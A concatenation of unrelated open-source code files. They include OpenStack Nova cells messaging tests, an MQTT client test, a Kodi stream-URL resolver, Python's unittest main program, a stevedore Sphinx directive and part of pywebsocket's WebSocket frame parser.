expected_bdm = fake_bdm.copy()
expected_bdm.pop('id')
fake_inst_bdms = [{'id': 1,
'volume_id': 'not-a-match',
'device_name': 'not-a-match'},
{'id': 2,
'volume_id': 'not-a-match',
'device_name': 'fake_device_name'},
{'id': 3,
'volume_id': 'not-a-match',
'device_name': 'not-a-match'}]
# Shouldn't be called for these 2 cells
self.mox.StubOutWithMock(self.src_db_inst,
'block_device_mapping_update')
self.mox.StubOutWithMock(self.mid_db_inst,
'block_device_mapping_update')
self.mox.StubOutWithMock(self.tgt_db_inst,
'block_device_mapping_get_all_by_instance')
self.mox.StubOutWithMock(self.tgt_db_inst,
'block_device_mapping_update')
self.tgt_db_inst.block_device_mapping_get_all_by_instance(
self.ctxt, 'fake_instance_uuid').AndReturn(
fake_inst_bdms)
# Should try to update ID 2.
self.tgt_db_inst.block_device_mapping_update(
self.ctxt, 2, expected_bdm, legacy=False)
self.mox.ReplayAll()
self.src_msg_runner.bdm_update_or_create_at_top(self.ctxt,
fake_bdm,
create=False)
def test_bdm_destroy_by_volume(self):
fake_instance_uuid = 'fake-instance-uuid'
fake_volume_id = 'fake-volume-name'
# Shouldn't be called for these 2 cells
self.mox.StubOutWithMock(self.src_db_inst,
'block_device_mapping_destroy_by_instance_and_volume')
self.mox.StubOutWithMock(self.mid_db_inst,
'block_device_mapping_destroy_by_instance_and_volume')
self.mox.StubOutWithMock(self.tgt_db_inst,
'block_device_mapping_destroy_by_instance_and_volume')
self.tgt_db_inst.block_device_mapping_destroy_by_instance_and_volume(
self.ctxt, fake_instance_uuid, fake_volume_id)
self.mox.ReplayAll()
self.src_msg_runner.bdm_destroy_at_top(self.ctxt, fake_instance_uuid,
volume_id=fake_volume_id)
def test_bdm_destroy_by_device(self):
fake_instance_uuid = 'fake-instance-uuid'
fake_device_name = 'fake-device-name'
# Shouldn't be called for these 2 cells
self.mox.StubOutWithMock(self.src_db_inst,
'block_device_mapping_destroy_by_instance_and_device')
self.mox.StubOutWithMock(self.mid_db_inst,
'block_device_mapping_destroy_by_instance_and_device')
self.mox.StubOutWithMock(self.tgt_db_inst,
'block_device_mapping_destroy_by_instance_and_device')
self.tgt_db_inst.block_device_mapping_destroy_by_instance_and_device(
self.ctxt, fake_instance_uuid, fake_device_name)
self.mox.ReplayAll()
self.src_msg_runner.bdm_destroy_at_top(self.ctxt, fake_instance_uuid,
device_name=fake_device_name)
def test_get_migrations(self):
self._setup_attrs(up=False)
filters = {'status': 'confirmed'}
migrations_from_cell1 = [{'id': 123}]
migrations_from_cell2 = [{'id': 456}]
self.mox.StubOutWithMock(self.mid_compute_api,
'get_migrations')
self.mid_compute_api.get_migrations(self.ctxt, filters).\
AndReturn(migrations_from_cell1)
self.mox.StubOutWithMock(self.tgt_compute_api,
'get_migrations')
self.tgt_compute_api.get_migrations(self.ctxt, filters).\
AndReturn(migrations_from_cell2)
self.mox.ReplayAll()
responses = self.src_msg_runner.get_migrations(
self.ctxt,
None, False, filters)
self.assertEqual(2, len(responses))
for response in responses:
self.assertIn(response.value_or_raise(), [migrations_from_cell1,
migrations_from_cell2])
    @mock.patch.object(objects.KeyPair, 'get_by_name',
                       return_value='fake_keypair')
    def test_get_keypair_at_top(self, fake_get_by_name):
        """A keypair found at the top cell is returned in the response."""
        user_id = 'fake_user_id'
        name = 'fake_keypair_name'
        responses = self.src_msg_runner.get_keypair_at_top(self.ctxt,
                                                           user_id, name)
        fake_get_by_name.assert_called_once_with(self.ctxt, user_id, name)
        # Only the cell that actually found the keypair carries a value.
        for response in responses:
            if response.value is not None:
                self.assertEqual('fake_keypair', response.value)
    @mock.patch.object(objects.KeyPair, 'get_by_name')
    def test_get_keypair_at_top_with_objects_exception(self, fake_get_by_name):
        """KeypairNotFound must be swallowed and surface as a None value,
        not as a raised exception."""
        user_id = 'fake_user_id'
        name = 'fake_keypair_name'
        keypair_exception = exception.KeypairNotFound(user_id=user_id,
                                                      name=name)
        fake_get_by_name.side_effect = keypair_exception
        responses = self.src_msg_runner.get_keypair_at_top(self.ctxt,
                                                           user_id,
                                                           name)
        fake_get_by_name.assert_called_once_with(self.ctxt, user_id, name)
        for response in responses:
            self.assertIsNone(response.value)
    @mock.patch.object(messaging._BroadcastMessage, 'process')
    def test_get_keypair_at_top_with_process_response(self, fake_process):
        """get_keypair_at_top should return the broadcast message's
        processed responses unchanged."""
        user_id = 'fake_user_id'
        name = 'fake_keypair_name'
        response = messaging.Response(self.ctxt, 'cell', 'keypair', False)
        other_response = messaging.Response(self.ctxt, 'cell',
                                            'fake_other_keypair', False)
        fake_process.return_value = [response, other_response]
        responses = self.src_msg_runner.get_keypair_at_top(self.ctxt,
                                                           user_id, name)
        fake_process.assert_called_once_with()
        self.assertEqual(fake_process.return_value, responses)
class CellsPublicInterfacesTestCase(test.NoDBTestCase):
    """Test case for the public interfaces into cells messaging."""
    def setUp(self):
        super(CellsPublicInterfacesTestCase, self).setUp()
        # Build the fake cell topology and act as the 'api-cell'.
        fakes.init(self)
        self.ctxt = context.RequestContext('fake', 'fake')
        self.our_name = 'api-cell'
        self.msg_runner = fakes.get_message_runner(self.our_name)
        self.state_manager = self.msg_runner.state_manager
    @mock.patch.object(messaging, '_TargetedMessage')
    def test_resize_instance(self, mock_message):
        """resize_instance should build a fire-and-forget targeted message
        routed 'down' to the instance's cell."""
        instance = objects.Instance(cell_name='api-cell!child-cell')
        flavor = 'fake'
        extra_instance_updates = {'fake': 'fake'}
        clean_shutdown = True
        self.msg_runner.resize_instance(self.ctxt, instance, flavor,
                                        extra_instance_updates,
                                        clean_shutdown=clean_shutdown)
        extra_kwargs = dict(flavor=flavor,
                            extra_instance_updates=extra_instance_updates,
                            clean_shutdown=clean_shutdown)
        method_kwargs = {'instance': instance}
        method_kwargs.update(extra_kwargs)
        mock_message.assert_called_once_with(self.msg_runner, self.ctxt,
                                             'resize_instance',
                                             method_kwargs, 'down',
                                             instance.cell_name,
                                             need_response=False)
|
ecaldwe1/zika | refs/heads/master | website/tests/__init__.py | 17 | # Copyright (C) 2016, University of Notre Dame
# All rights reserved
|
saapooch/Carl-Chandra-Analysis | refs/heads/master | strategies/base.py | 1 | import random
class Decision(object):
    """A single trade decision for one ticker.

    All attributes simply mirror the constructor arguments and may be
    left as None.
    """

    def __init__(self, ticker=None, action=None, amount=None, error=None):
        # Record the supplied values verbatim; no validation is done here.
        self.ticker = ticker
        self.action = action
        self.amount = amount
        self.error = error

    def __repr__(self):
        return 'Decision(%s, %s, %s, %s)' % (
            self.ticker, self.action, self.amount, self.error)
class BaseStrategy(object):
    """Common base class for strategies; holds the portfolio acted upon."""

    def __init__(self, portfolio=None):
        # The portfolio this strategy inspects when producing decisions.
        self.portfolio = portfolio
class RandomStrategy(BaseStrategy):
    """
    A test strategy. Should take what day it is and then simply output a decision

    For every ticker held in the portfolio a fair coin flip picks the
    action (0 or 1) with a fixed amount of 5.
    """
    def create_decisions(self, date):
        """Return one random Decision per ticker in the portfolio.

        :param date: current date; unused, kept for interface parity with
            other strategies.
        :returns: list of Decision objects.
        """
        decisions = []
        # Iterate keys only: the stock values were fetched and discarded
        # by the original loop (``for key, value in ...items()``).
        for ticker in self.portfolio.stocks:
            # Both branches used amount=5; only the action differs.
            action = 0 if random.uniform(0, 1) < .5 else 1
            decisions.append(Decision(ticker=ticker, action=action, amount=5))
        return decisions
|
DavideCanton/Python3 | refs/heads/master | prove_igraph/__init__.py | 27 | __author__ = 'davide'
|
PaoloMissier/IoT-tracking | refs/heads/master | VAUGHN/broker/mosquitto-1.4.10_CASS/test/lib/01-no-clean-session.py | 10 | #!/usr/bin/env python
# Test whether a client produces a correct connect with clean session not set.
# The client should connect to port 1888 with keepalive=60, clean session not
# set, and client id 01-no-clean-session.
import inspect
import os
import socket
import sys
# From http://stackoverflow.com/questions/279237/python-import-a-module-from-a-folder
cmd_subfolder = os.path.realpath(os.path.abspath(os.path.join(os.path.split(inspect.getfile( inspect.currentframe() ))[0],"..")))
if cmd_subfolder not in sys.path:
sys.path.insert(0, cmd_subfolder)
import mosq_test
# Exit status: non-zero until the expected CONNECT packet is observed.
rc = 1
keepalive = 60
# The client under test must send clean_session=False.
connect_packet = mosq_test.gen_connect("01-no-clean-session", clean_session=False, keepalive=keepalive)
# Act as a fake broker: listen on port 1888 and wait for the client.
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
sock.settimeout(10)
sock.bind(('', 1888))
sock.listen(5)
client_args = sys.argv[1:]
env = dict(os.environ)
# Let the spawned client find the freshly built C/C++ and Python libs.
env['LD_LIBRARY_PATH'] = '../../lib:../../lib/cpp'
try:
    pp = env['PYTHONPATH']
except KeyError:
    pp = ''
env['PYTHONPATH'] = '../../lib/python:'+pp
client = mosq_test.start_client(filename=sys.argv[1].replace('/', '-'), cmd=client_args, env=env)
try:
    (conn, address) = sock.accept()
    conn.settimeout(10)
    # Success iff the received CONNECT matches the expected bytes.
    if mosq_test.expect_packet(conn, "connect", connect_packet):
        rc = 0
    conn.close()
finally:
    # Always reap the client process and release the listening socket.
    client.terminate()
    client.wait()
    sock.close()
exit(rc)
|
Microvellum/Fluid-Designer | refs/heads/master | win64-vc/2.78/Python/bin/2.78/scripts/addons/presets/operator/mesh.primitive_xyz_function_surface/klein.py | 3 | import bpy
op = bpy.context.active_operator
op.x_eq = '(3*(1+sin(v)) + 2*(1-cos(v)/2)*cos(u))*cos(v)'
op.y_eq = '(4+2*(1-cos(v)/2)*cos(u))*sin(v)'
op.z_eq = '-2*(1-cos(v)/2)*sin(u)'
op.range_u_min = 0.0
op.range_u_max = 6.2831854820251465
op.range_u_step = 32
op.wrap_u = True
op.range_v_min = 0.0
op.range_v_max = 6.2831854820251465
op.range_v_step = 128
op.wrap_v = False
op.close_v = False
op.n_eq = 1
op.a_eq = '0'
op.b_eq = '0'
op.c_eq = '0'
op.f_eq = '0'
op.g_eq = '0'
op.h_eq = '0'
|
sanctuaryaddon/sanctuary | refs/heads/master | script.module.liveresolver/lib/liveresolver/resolvers/iguide.py | 2 | # -*- coding: utf-8 -*-
import re,urlparse,json
from liveresolver.modules import client,constants
from liveresolver.modules.log_utils import log
def resolve(url):
    """Resolve an iguide.to embed URL to a playable rtmp:// URL string.

    NOTE(review): scrapes the embed player page, so it breaks whenever the
    site changes its markup; presumably `url` carries `channel` and
    optionally `referer` query parameters -- confirm against callers.
    """
    #try:
    # Fall back to the page itself when no explicit referer is given.
    try: referer = urlparse.parse_qs(urlparse.urlparse(url).query)['referer'][0]
    except: referer = url
    try:
        channel = urlparse.parse_qs(urlparse.urlparse(url).query)['channel'][0]
    except:
        # No query parameter: pull the channel id out of an /embed/<id>& path.
        channel = re.compile('/embed/(\d+)&').findall(url)[0]
    page = 'http://www.iguide.to/embedplayer_new.php?width=700&height=410&channel=%s&autoplay=true' % channel
    log(page)
    headers = {'Host':'www.iguide.to','Connection':'keep-alive'}
    result = client.request(page, referer=referer,headers = headers)
    log(result)
    # The page fetches a session token via an AJAX $.getJSON call.
    token_url =re.compile('\$.getJSON\("(.+?)", function\(json\){').findall(result)[0]
    token = json.loads(client.request(token_url, referer=referer))['token']
    # Extract the stream name and rtmp application from the player config.
    file = re.compile('(?:\'|\")?file(?:\'|\")?\s*:\s*(?:\'|\")(.+?)(?:\'|\")').findall(result)[0].replace('.flv','')
    rtmp = re.compile('(?:\'|\")?streamer(?:\'|\")?\s*:\s*(?:\'|\")(.+?)(?:\'|\")').findall(result)[0].replace(r'\\','\\').replace(r'\/','/')
    app = re.compile('.*.*rtmp://[\.\w:]*/([^\s]+)').findall(rtmp)[0]
    # Assemble a librtmp-style URL with swf verification and the token.
    url=rtmp + ' playpath=' + file + ' swfUrl=http://www.iguide.to/player/secure_player_iguide_token.swf flashver=' + constants.flash_ver() + ' live=1 timeout=15 token=' + token + ' swfVfy=1 pageUrl='+page
    return url
    #except:
    #    return
|
brokenjacobs/ansible | refs/heads/devel | lib/ansible/modules/net_tools/basics/__init__.py | 12133432 | |
reinout/django | refs/heads/master | tests/migrations/test_migrations_squashed_complex/__init__.py | 12133432 | |
wf4ever/ro-manager | refs/heads/master | src/roweb/__init__.py | 12133432 | |
ismk/Python-Examples | refs/heads/master | learn python the hard way/ex34.py | 12133432 | |
sgzsh269/django | refs/heads/master | tests/template_backends/apps/good/__init__.py | 12133432 | |
thnee/ansible | refs/heads/devel | lib/ansible/module_utils/network/vyos/config/__init__.py | 12133432 | |
sbarakat/graph-partitioning | refs/heads/master | graph_partitioning/partitioners/__init__.py | 12133432 | |
Event38/MissionPlanner | refs/heads/master | Lib/unittest/main.py | 53 | """Unittest main program"""
import sys
import os
import types
from . import loader, runner
from .signals import installHandler
__unittest = True
FAILFAST = " -f, --failfast Stop on first failure\n"
CATCHBREAK = " -c, --catch Catch control-C and display results\n"
BUFFEROUTPUT = " -b, --buffer Buffer stdout and stderr during test runs\n"
USAGE_AS_MAIN = """\
Usage: %(progName)s [options] [tests]
Options:
-h, --help Show this message
-v, --verbose Verbose output
-q, --quiet Minimal output
%(failfast)s%(catchbreak)s%(buffer)s
Examples:
%(progName)s test_module - run tests from test_module
%(progName)s module.TestClass - run tests from module.TestClass
%(progName)s module.Class.test_method - run specified test method
[tests] can be a list of any number of test modules, classes and test
methods.
Alternative Usage: %(progName)s discover [options]
Options:
-v, --verbose Verbose output
%(failfast)s%(catchbreak)s%(buffer)s -s directory Directory to start discovery ('.' default)
-p pattern Pattern to match test files ('test*.py' default)
-t directory Top level directory of project (default to
start directory)
For test discovery all test modules must be importable from the top
level directory of the project.
"""
USAGE_FROM_MODULE = """\
Usage: %(progName)s [options] [test] [...]
Options:
-h, --help Show this message
-v, --verbose Verbose output
-q, --quiet Minimal output
%(failfast)s%(catchbreak)s%(buffer)s
Examples:
%(progName)s - run default set of tests
%(progName)s MyTestSuite - run suite 'MyTestSuite'
%(progName)s MyTestCase.testSomething - run MyTestCase.testSomething
%(progName)s MyTestCase - run all 'test*' test methods
in MyTestCase
"""
class TestProgram(object):
    """A command-line program that runs a set of tests; this is primarily
       for making test modules conveniently executable.
    """
    # NOTE: this is Python 2 source (print statements, `except E, v` syntax).
    USAGE = USAGE_FROM_MODULE

    # defaults for testing
    failfast = catchbreak = buffer = progName = None

    def __init__(self, module='__main__', defaultTest=None, argv=None,
                    testRunner=None, testLoader=loader.defaultTestLoader,
                    exit=True, verbosity=1, failfast=None, catchbreak=None,
                    buffer=None):
        # A string module name is imported and walked dotted-part by
        # dotted-part; anything else is taken to already be a module object.
        if isinstance(module, basestring):
            self.module = __import__(module)
            for part in module.split('.')[1:]:
                self.module = getattr(self.module, part)
        else:
            self.module = module
        if argv is None:
            argv = sys.argv

        self.exit = exit
        self.failfast = failfast
        self.catchbreak = catchbreak
        self.verbosity = verbosity
        self.buffer = buffer
        self.defaultTest = defaultTest
        self.testRunner = testRunner
        self.testLoader = testLoader
        self.progName = os.path.basename(argv[0])
        # Parsing immediately triggers the run; constructing a TestProgram
        # executes the tests as a side effect.
        self.parseArgs(argv)
        self.runTests()

    def usageExit(self, msg=None):
        # Print optional message plus usage text, then exit with status 2.
        if msg:
            print msg
        usage = {'progName': self.progName, 'catchbreak': '', 'failfast': '',
                 'buffer': ''}
        # A flag attribute of False means "option disabled": hide its help.
        if self.failfast != False:
            usage['failfast'] = FAILFAST
        if self.catchbreak != False:
            usage['catchbreak'] = CATCHBREAK
        if self.buffer != False:
            usage['buffer'] = BUFFEROUTPUT
        print self.USAGE % usage
        sys.exit(2)

    def parseArgs(self, argv):
        # 'discover' as the first argument switches to discovery mode.
        if len(argv) > 1 and argv[1].lower() == 'discover':
            self._do_discovery(argv[2:])
            return

        import getopt
        long_opts = ['help', 'verbose', 'quiet', 'failfast', 'catch', 'buffer']
        try:
            options, args = getopt.getopt(argv[1:], 'hHvqfcb', long_opts)
            for opt, value in options:
                if opt in ('-h','-H','--help'):
                    self.usageExit()
                if opt in ('-q','--quiet'):
                    self.verbosity = 0
                if opt in ('-v','--verbose'):
                    self.verbosity = 2
                if opt in ('-f','--failfast'):
                    if self.failfast is None:
                        self.failfast = True
                    # Should this raise an exception if -f is not valid?
                if opt in ('-c','--catch'):
                    if self.catchbreak is None:
                        self.catchbreak = True
                    # Should this raise an exception if -c is not valid?
                if opt in ('-b','--buffer'):
                    if self.buffer is None:
                        self.buffer = True
                    # Should this raise an exception if -b is not valid?
            if len(args) == 0 and self.defaultTest is None:
                # createTests will load tests from self.module
                self.testNames = None
            elif len(args) > 0:
                self.testNames = args
                if __name__ == '__main__':
                    # to support python -m unittest ...
                    self.module = None
            else:
                self.testNames = (self.defaultTest,)
            self.createTests()
        except getopt.error, msg:
            self.usageExit(msg)

    def createTests(self):
        # Build self.test either from the whole module or from named tests.
        if self.testNames is None:
            self.test = self.testLoader.loadTestsFromModule(self.module)
        else:
            self.test = self.testLoader.loadTestsFromNames(self.testNames,
                                                           self.module)

    def _do_discovery(self, argv, Loader=loader.TestLoader):
        # handle command line args for test discovery
        self.progName = '%s discover' % self.progName
        import optparse
        parser = optparse.OptionParser()
        parser.prog = self.progName
        parser.add_option('-v', '--verbose', dest='verbose', default=False,
                          help='Verbose output', action='store_true')
        if self.failfast != False:
            parser.add_option('-f', '--failfast', dest='failfast', default=False,
                              help='Stop on first fail or error',
                              action='store_true')
        if self.catchbreak != False:
            parser.add_option('-c', '--catch', dest='catchbreak', default=False,
                              help='Catch ctrl-C and display results so far',
                              action='store_true')
        if self.buffer != False:
            parser.add_option('-b', '--buffer', dest='buffer', default=False,
                              help='Buffer stdout and stderr during tests',
                              action='store_true')
        parser.add_option('-s', '--start-directory', dest='start', default='.',
                          help="Directory to start discovery ('.' default)")
        parser.add_option('-p', '--pattern', dest='pattern', default='test*.py',
                          help="Pattern to match tests ('test*.py' default)")
        parser.add_option('-t', '--top-level-directory', dest='top', default=None,
                          help='Top level directory of project (defaults to start directory)')

        options, args = parser.parse_args(argv)
        if len(args) > 3:
            self.usageExit()

        # Positional args may override -s / -p / -t, in that order.
        for name, value in zip(('start', 'pattern', 'top'), args):
            setattr(options, name, value)

        # only set options from the parsing here
        # if they weren't set explicitly in the constructor
        if self.failfast is None:
            self.failfast = options.failfast
        if self.catchbreak is None:
            self.catchbreak = options.catchbreak
        if self.buffer is None:
            self.buffer = options.buffer

        if options.verbose:
            self.verbosity = 2

        start_dir = options.start
        pattern = options.pattern
        top_level_dir = options.top

        loader = Loader()
        self.test = loader.discover(start_dir, pattern, top_level_dir)

    def runTests(self):
        if self.catchbreak:
            installHandler()
        if self.testRunner is None:
            self.testRunner = runner.TextTestRunner
        # A runner class is instantiated (old-style classes included); a
        # runner instance is used as-is.
        if isinstance(self.testRunner, (type, types.ClassType)):
            try:
                testRunner = self.testRunner(verbosity=self.verbosity,
                                             failfast=self.failfast,
                                             buffer=self.buffer)
            except TypeError:
                # didn't accept the verbosity, buffer or failfast arguments
                testRunner = self.testRunner()
        else:
            # it is assumed to be a TestRunner instance
            testRunner = self.testRunner
        self.result = testRunner.run(self.test)
        if self.exit:
            sys.exit(not self.result.wasSuccessful())
main = TestProgram
|
kenshay/ImageScript | refs/heads/master | ProgramData/SystemFiles/Python/Lib/site-packages/django/contrib/sitemaps/apps.py | 590 | from django.apps import AppConfig
from django.utils.translation import ugettext_lazy as _
class SiteMapsConfig(AppConfig):
    """AppConfig for the django.contrib.sitemaps application."""
    name = 'django.contrib.sitemaps'
    # Lazily translated label shown in the admin and app listings.
    verbose_name = _("Site Maps")
|
Elettronik/SickRage | refs/heads/master | lib/stevedore/sphinxext.py | 34 | # Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from __future__ import unicode_literals
import inspect
from docutils import nodes
from docutils.parsers import rst
from docutils.parsers.rst import directives
from docutils.statemachine import ViewList
from sphinx.util.nodes import nested_parse_with_titles
from stevedore import extension
def _get_docstring(plugin):
return inspect.getdoc(plugin) or ''
def _simple_list(mgr):
    """Yield one ``(bullet_line, module_name)`` pair per extension."""
    for ext_name in sorted(mgr.names()):
        ext = mgr[ext_name]
        # An absent docstring falls back to '\n' so splitlines() is safe.
        docstring = _get_docstring(ext.plugin) or '\n'
        summary_line = docstring.splitlines()[0].strip()
        yield ('* %s -- %s' % (ext.name, summary_line),
               ext.entry_point.module_name)
def _detailed_list(mgr, over='', under='-', titlecase=False):
    """Yield ``(text, module_name)`` pairs forming a titled section per
    extension: optional overline, title, optional underline, then the
    plugin docstring (or a warning when there is none)."""
    for ext_name in sorted(mgr.names()):
        ext = mgr[ext_name]
        module = ext.entry_point.module_name
        if over:
            yield (over * len(ext.name), module)
        yield (ext.name.title() if titlecase else ext.name, module)
        if under:
            yield (under * len(ext.name), module)
        yield ('\n', module)
        doc = _get_docstring(ext.plugin)
        if doc:
            yield (doc, module)
        else:
            yield ('.. warning:: No documentation found in %s'
                   % ext.entry_point,
                   module)
        yield ('\n', module)
class ListPluginsDirective(rst.Directive):
    """Present a simple list of the plugins in a namespace."""

    # Options accepted by the directive in the .rst source.
    option_spec = {
        'class': directives.class_option,
        'detailed': directives.flag,
        'titlecase': directives.flag,
        'overline-style': directives.single_char_or_unicode,
        'underline-style': directives.single_char_or_unicode,
    }

    has_content = True

    def run(self):
        """Load the extensions of the named namespace and render them.

        The directive's content is the entry-point namespace to document.
        Returns the child nodes of a freshly parsed section.
        """
        env = self.state.document.settings.env
        app = env.app

        namespace = ' '.join(self.content).strip()
        app.info('documenting plugins from %r' % namespace)
        overline_style = self.options.get('overline-style', '')
        underline_style = self.options.get('underline-style', '=')

        def report_load_failure(mgr, ep, err):
            # Surface broken entry points as build warnings, not errors.
            app.warn(u'Failed to load %s: %s' % (ep.module_name, err))

        mgr = extension.ExtensionManager(
            namespace,
            on_load_failure_callback=report_load_failure,
        )

        result = ViewList()

        titlecase = 'titlecase' in self.options
        if 'detailed' in self.options:
            data = _detailed_list(
                mgr, over=overline_style, under=underline_style,
                titlecase=titlecase)
        else:
            data = _simple_list(mgr)
        for text, source in data:
            for line in text.splitlines():
                result.append(line, source)

        # Parse what we have into a new section.
        node = nodes.section()
        node.document = self.state.document
        nested_parse_with_titles(self.state, result, node)

        return node.children
def setup(app):
    """Sphinx extension entry point: register the list-plugins directive."""
    app.info('loading stevedore.sphinxext')
    app.add_directive('list-plugins', ListPluginsDirective)
|
nieyb/yuanhe | refs/heads/master | deb_tmp/wifi-pumpkin_20171031_all/usr/share/WiFi-Pumpkin/plugins/external/scripts/__init__.py | 8 | #from http://stackoverflow.com/questions/1057431/loading-all-modules-in-a-folder-in-python
import os
import glob
__all__ = [ os.path.basename(f)[:-3] for f in glob.glob(os.path.dirname(__file__)+"/*.py")] |
shssoichiro/servo | refs/heads/master | tests/wpt/web-platform-tests/tools/pywebsocket/src/mod_pywebsocket/_stream_hybi.py | 628 | # Copyright 2012, Google Inc.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following disclaimer
# in the documentation and/or other materials provided with the
# distribution.
# * Neither the name of Google Inc. nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
"""This file provides classes and helper functions for parsing/building frames
of the WebSocket protocol (RFC 6455).
Specification:
http://tools.ietf.org/html/rfc6455
"""
from collections import deque
import logging
import os
import struct
import time
from mod_pywebsocket import common
from mod_pywebsocket import util
from mod_pywebsocket._stream_base import BadOperationException
from mod_pywebsocket._stream_base import ConnectionTerminatedException
from mod_pywebsocket._stream_base import InvalidFrameException
from mod_pywebsocket._stream_base import InvalidUTF8Exception
from mod_pywebsocket._stream_base import StreamBase
from mod_pywebsocket._stream_base import UnsupportedFrameException
_NOOP_MASKER = util.NoopMasker()
class Frame(object):
    """Plain value object for one WebSocket frame: the RFC 6455 header
    bits plus the (already unmasked) payload."""

    def __init__(self, fin=1, rsv1=0, rsv2=0, rsv3=0,
                 opcode=None, payload=''):
        # Store everything verbatim; no validation happens here.
        self.opcode = opcode
        self.payload = payload
        self.fin = fin
        self.rsv1 = rsv1
        self.rsv2 = rsv2
        self.rsv3 = rsv3
# Helper functions made public to be used for writing unittests for WebSocket
# clients.
def create_length_header(length, mask):
    """Creates a length header.

    Args:
        length: Frame length. Must be less than 2^63.
        mask: Mask bit. Must be boolean.

    Raises:
        ValueError: when bad data is given.
    """
    if length < 0:
        raise ValueError('length must be non negative integer')

    mask_bit = (1 << 7) if mask else 0

    # RFC 6455 length encoding: 7 bits, or 126 + 2 octets, or 127 + 8 octets.
    if length <= 125:
        return chr(mask_bit | length)
    if length < (1 << 16):
        return chr(mask_bit | 126) + struct.pack('!H', length)
    if length < (1 << 63):
        return chr(mask_bit | 127) + struct.pack('!Q', length)
    raise ValueError('Payload is too big for one frame')
def create_header(opcode, payload_length, fin, rsv1, rsv2, rsv3, mask):
    """Creates a frame header (first octet plus the length field).

    Raises:
        Exception: when bad data is given.
    """
    if not 0 <= opcode <= 0xf:
        raise ValueError('Opcode out of range')
    if not 0 <= payload_length < (1 << 63):
        raise ValueError('payload_length out of range')
    if (fin | rsv1 | rsv2 | rsv3) & ~1:
        raise ValueError('FIN bit and Reserved bit parameter must be 0 or 1')

    # Pack FIN/RSV1-3/opcode into the first octet, then append the length.
    first_byte = ((fin << 7)
                  | (rsv1 << 6) | (rsv2 << 5) | (rsv3 << 4)
                  | opcode)
    return chr(first_byte) + create_length_header(payload_length, mask)
def _build_frame(header, body, mask):
if not mask:
return header + body
masking_nonce = os.urandom(4)
masker = util.RepeatedXorMasker(masking_nonce)
return header + masking_nonce + masker.mask(body)
def _filter_and_format_frame_object(frame, mask, frame_filters):
    """Run every frame filter over *frame*, then serialize it to wire bytes."""
    for filter_ in frame_filters:
        filter_.filter(frame)

    # Header length must reflect the (possibly filter-modified) payload.
    wire_header = create_header(frame.opcode, len(frame.payload), frame.fin,
                                frame.rsv1, frame.rsv2, frame.rsv3, mask)
    return _build_frame(wire_header, frame.payload, mask)
def create_binary_frame(
    message, opcode=common.OPCODE_BINARY, fin=1, mask=False, frame_filters=[]):
    """Creates a simple binary frame with no extension, reserved bit."""
    return _filter_and_format_frame_object(
        Frame(fin=fin, opcode=opcode, payload=message), mask, frame_filters)
def create_text_frame(
    message, opcode=common.OPCODE_TEXT, fin=1, mask=False, frame_filters=[]):
    """Creates a simple text frame with no extension, reserved bit."""
    # Text payloads go on the wire UTF-8 encoded.
    return create_binary_frame(message.encode('utf-8'), opcode, fin, mask,
                               frame_filters)
def parse_frame(receive_bytes, logger=None,
                ws_version=common.VERSION_HYBI_LATEST,
                unmask_receive=True):
    """Parses a frame. Returns a tuple containing each header field and
    payload.

    Args:
        receive_bytes: a function that reads frame data from a stream or
            something similar. The function takes length of the bytes to be
            read. The function must raise ConnectionTerminatedException if
            there is not enough data to be read.
        logger: a logging object.
        ws_version: the version of WebSocket protocol.
        unmask_receive: unmask received frames. When received unmasked
            frame, raises InvalidFrameException.

    Raises:
        ConnectionTerminatedException: when receive_bytes raises it.
        InvalidFrameException: when the frame contains invalid data.
    """
    if not logger:
        logger = logging.getLogger()

    logger.log(common.LOGLEVEL_FINE, 'Receive the first 2 octets of a frame')

    received = receive_bytes(2)

    # Python 2: indexing a str yields a 1-char str, hence the ord() calls.
    first_byte = ord(received[0])
    fin = (first_byte >> 7) & 1
    rsv1 = (first_byte >> 6) & 1
    rsv2 = (first_byte >> 5) & 1
    rsv3 = (first_byte >> 4) & 1
    opcode = first_byte & 0xf

    second_byte = ord(received[1])
    mask = (second_byte >> 7) & 1
    payload_length = second_byte & 0x7f

    logger.log(common.LOGLEVEL_FINE,
               'FIN=%s, RSV1=%s, RSV2=%s, RSV3=%s, opcode=%s, '
               'Mask=%s, Payload_length=%s',
               fin, rsv1, rsv2, rsv3, opcode, mask, payload_length)

    if (mask == 1) != unmask_receive:
        raise InvalidFrameException(
            'Mask bit on the received frame did\'nt match masking '
            'configuration for received frames')

    # The HyBi and later specs disallow putting a value in 0x0-0xFFFF
    # into the 8-octet extended payload length field (or 0x0-0xFD in
    # 2-octet field).
    valid_length_encoding = True
    length_encoding_bytes = 1
    if payload_length == 127:
        logger.log(common.LOGLEVEL_FINE,
                   'Receive 8-octet extended payload length')

